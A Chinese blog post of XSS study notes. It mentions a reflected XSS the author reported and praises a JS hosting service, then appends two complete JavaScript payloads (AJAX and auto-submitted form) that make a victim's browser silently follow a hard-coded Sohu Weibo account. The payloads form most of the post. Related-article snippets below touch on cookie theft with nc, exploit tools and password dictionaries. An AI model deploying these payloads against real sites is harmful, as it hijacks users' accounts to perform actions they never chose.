xss漏洞及其他-学习笔记

最新推荐文章于 2025-04-27 01:10:55 发布
原创 最新推荐文章于 2025-04-27 01:10:55 发布 · 131 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文探讨了使用Sinaapp应用的便捷性,提供了在线编辑JS文件的方法,并展示了如何通过两种方式(传统js加form提交与AJAX)在搜狐微博中添加关注。同时分享了一个关于学习JavaScript的博客链接。

http://www.wooyun.org/bugs/wooyun-2010-010041

这是今天忙活了下的结果。发现了个比较鸡肋的反射型xss

 

另外还学习了sina app的应用,果然比较爽,各种自己的js文件,在线编辑,非常方便。

 

此外下次blog的任务是

http://www.inbreak.net/archives/389

空虚浪子心的blog非常cool

 

 

附录是两个搜狐微博加关注的js脚本

var xmlHttp=null; 

function createXMLHttpRequest() 
{ 
if(xmlHttp == null){
if(window.XMLHttpRequest) {
//Mozilla 浏览器
xmlHttp = new XMLHttpRequest();
}else if(window.ActiveXObject) {
// IE浏览器
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
}
} 

function openAjax() 
{ 
if( xmlHttp == null)
{ 
createXMLHttpRequest(); 
if( xmlHttp == null)
{
//alert('出错');
return ;
}
} 
xmlHttp.onreadystatechange=xmlHttpChange; 

xmlHttp.open("post","/follow/addfollows",true); 
xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");  
xmlHttp.setRequestHeader("X-Requested-With","XMLHttpRequest");  
xmlHttp.send("act=follow&friendids=595824670&type=follow7");
} 

function xmlHttpChange() 
{ 
if(xmlHttp.readyState==4) 
{ 
if(xmlHttp.status==200) 
{ 
  
} 
} 
}  
openAjax();

 

 

传统的js加form提交型

var act = 'follow'; 
//it's icefish冰's weibo
//act=follow&friendids=595824670&type=follow7
var friendids = '595824670'; 
var type='follow7';
           
var sohuAddFollowForm = document.createElement("form");//表单对象   
sohuAddFollowForm.method="post" ;   
sohuAddFollowForm.action = '/follow/addfollows' ;   
       
      var actInput = document.createElement("input") ;  //
      actInput.setAttribute("name", "act") ;   
      actInput.setAttribute("value", act);   
      sohuAddFollowForm.appendChild(actInput) ;   
      
      var friendidsInput = document.createElement("input");// 
      friendidsInput.setAttribute("name","friendids"); 
      friendidsInput.setAttribute("value",friendids); 
      sohuAddFollowForm.appendChild(friendidsInput); 
       
      var typeInput = document.createElement("input");// 
      typeInput.setAttribute("name","type"); 
      typeInput.setAttribute("value",type); 
      sohuAddFollowForm.appendChild(typeInput); 
       
      document.body.appendChild(sohuAddFollowForm) ;   
      sohuAddFollowForm.submit() ;   
      document.body.removeChild(sohuAddFollowForm) ;
 
【每天认识一个漏洞】JQuery-XSS漏洞
菜鸟小羊的博客
02-24 1134
在src处替换为 jquery 的目标路径地址即可,打开html。点击Append via .html(),可弹窗说明漏洞存在。JQuery版本大于等于1.2 ,小于 3.5.0。
Jquery XSS漏洞(CVE-2020-11022)
热门推荐
jammny
02-04 2万+
漏洞详情 jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。 漏洞影响 V 1.2.0 <= jquery < V 3.5.0 漏洞分析 在html()方
cookie XSS跨站脚本攻击 localStorage sessionStorage
weixin_45348067的博客
02-13 1031
cookie 1、根据域名和路径进行存储 2、只能存储文本信息 3、只存储在指定的位置,不能随意改变位置 4、cookie后来都做了加密隐藏处理,现在无法直接找到cookie文件内容 5、cookie只能做临时存储,如果关闭浏览器,数据将会丢失 在cookie使用中,主要用于前后端不分离,如果前后端分离,使用AJAX发送时是不同的前后端不分离时,cookie会被自动携带发送到服务端,前后端不分离通...
XSS漏洞学习笔记
Tonight_Fantasy的博客
03-18 979
https://a.com/#test该url的意思是访问a网站页面中id=test的内容,这个id不是get请求的参数,而是网站元素的id。https://a.com:8080/page1 和 https://a.com:8080/page2。https://a.com/page1 和 https://a.com:8080/page2。https://a.com/page1 和 https://asd.a.com/page2。两者协议都为https,域名都为a.com,端口都为8080,所以同源。
xss漏洞学习笔记
zhh2694399673的博客
03-20 233
在自己的电脑上将恶意代码输入进某个网站的输入框,出现了恶意反馈后,可以获得有同样效果的恶意URL链接,可以将这个URL发送给别人,或者嵌入自己的网站中。产生原因:由于网站的输入输出过滤不严谨,执行了黑客“精构造的代码”通过js代码操作dom文档对象模型时触发的漏洞,一般不与服务端交互。出现这两种区分的主要原因是恶意脚本的存储位置和执行方式不同,
XSS学习笔记---Pikachu漏洞平台
CyhDl666的博客
01-22 674
文章目录XSS一.XSS概述二.XSS漏洞测试流程三.XSS注入实例3.1反射性XSS3.1.1概述3.1.2攻击实例 XSS 一.XSS概述 XSS是发生在Web前端的漏洞,所以其危害对象主要是前端用户 XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取、甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等 -图片来自i春秋 漏洞形成原因:形成XSS漏洞的主要原因是程序对输入和输出的控制不严格,导致构造的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。 二.XSS
渗透环境安装篇之安装XSS漏洞靶场xss-labs
m0_64628473的博客
07-13 447
4、访问http://localhost/xss-labs/教程基础环境:在物理机安装phpstudy。2、将靶场文件解压到WWW目录下。注意:不能嵌套文件夹。3、启动apache。
XSS跨站--代码过滤和httpOnly
最新发布
2301_80629787的博客
04-27 905
保存读取没保存读取。
【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
brhhh_sehe的博客
12-19 1264
用户在输入框中输入图片地址存储到str变量中 然后在xss()函数里面给id为demo的标签设置内容(innerHTML) 内容是加载图片,所以我们输入时放一个无法加载的图片,然后触发onerror事件,在这个事件里面可以触发弹窗,注意构造payload的时候一定要把img标签进行闭合。自己语言的转义:我认为就是在该网站中,比如说存在留言功能,然后攻击者留言了一段恶意代码,这段留言是别的用户也可以访问到的,在其他用户查看这段留言的时候服务器进行解析,导致执行一些危险行为,这个整段过程就是跨站脚本攻击。
CTFshow_XSSxss-labs全关卡万字通关笔记
dasdasdasvsdV的博客
07-31 636
反射型非持久型,常见的就是在URL中构造,将恶意链接发送给目标用户。当用户访问该链接时候,会向服务器发起一个GET请求来访问带有恶意代码的链接。造成反射型XSS主要是GET类型。存储型持久型,常见的就是在博客留言板、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端(数据库、内存、文件系统等),每次访问都会触发恶意代码。DOM型DOM型XSS其实是一种特殊类型的反射型XSS,也被称作本地跨站,它是基于DOM文档对象模型的一种漏洞
CISP-PTS学习笔记-XSS
文公子的博客
06-26 1400
XSS靶场c0ny1/xssed http://172.16.243.133:85/ 启动一个nc服务 使用payload插入存储型/反射性XSS ,一般是留言,公告等位置。 nc获取到cookie 将cookie替换成浏览器cookie并刷新页面 核知识点是普通用户获取管理员用户cookie ,刷新页面后得到管理员权限。...
访问控制/越权漏洞 -- 学习笔记
angry_program的博客
08-22 6504
访问控制概念 简单的来说就是应用程序首先会判断用户的身份(账号密码登录),随后确认后续请求是否由该用户发出(会话管理),然后判断是否允许用户执行“所请求的操作”或访问“所请求的资源(访问控制)” 1、从用户角度访问控制模型分为以下类型: 垂直访问控制:控制不同权限等级的用户访问应用程序不同的功能;如“管理员”可以修改/删除账号,而普通账号无法操作。 水平访问控制:控制用户只能访问自己的资源,而不能访问其他用户相同类型的资源;如“银行程序用户只能从自己的账号进行付款,而不能查看其他用户的账户”。 上
python 反编译 pyc 一些
ice
09-06 3032
0x01 , 现在用python的人也多了起来,代码安全始终是我们要考虑的问题,比如说我们要将我们的成果发布出去,py直接发布肯定是不行的(除非你是开源的),那么我们就只能考虑发布pyc文件了,     0x02,今天讨论的就是怎么反编译pyc到源代码的技术,从道理上来讲,这个是完全没问题的,而且反编译出来的代码质量应该相当高才对(参考java class的原理),在百度里面搜索的话,信息量...
密码字典
ice
02-16 1845
这是我根据前一段各种密码门做的一个密码字典(大概通过3亿多账号统计出来的,当然有重复,也有数据不规整),我给大家放出来一部分高频密码统计  ...
metasploit 图形化界面和自动化exploit脚本
ice
10-21 1816
0x01 最新版的metasploit没了图形化界面,              armitage开始收费              那我们就选用msfgui吧,安装简单                https://raw.github.com/scriptjunkie/msfgui/master/msfgui-installer.exe               下载安装就可以了 ...
ewebeditor 3.8 任意文件上传漏洞解析
ice
11-09 1318
   首先这个是别人早都发出来的一个漏洞,exp也写好了,如下 &lt;title&gt;eWebeditoR3.8 for php任意文件上EXP&lt;/title&gt; &lt;form action="" method=post enctype="multipart/form-data"&gt; &lt;INPUT TYPE="hidden" name="MAX_F
APKTool签名的一个问题
ice
10-14 813
0x01 昨天写了反编译,今天就写下签名的问题   0x02 apktool的重打包功能大家都知道,堪称神器,各类破解人事必备之良器,          用法不多说,只说签名容易遇到的问题 0x03 创建私钥仓库这个事情就不多说,方法很多,eclipse和keytool       都有类似功能         需要注意的是,这个私钥仓库一共有两个密码,一个是私钥仓库的密码(stor...
CVE 2012 0507 分析
ice
12-17 810
0x01 https://github.com/wchen-r7/metasploit-framework/blob/791ebdb679d53f6363cf88a54db57722719cd62a/external/source/exploits/CVE-2012-0507/Exploit.java   这里就是java的cve 2012 0507的poc所在了,大部分网上流传的基本上...
xss-labs笔记
04-01
### XSS-Labs学习笔记与解决方案 #### 关于XSS-Labs的理解 XSS-Labs 是一种用于练习跨站脚本攻击(Cross-Site Scripting, XSS)技巧的在线平台。它提供了多个难度等级的挑战,帮助用户了解并掌握如何绕过常见的安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值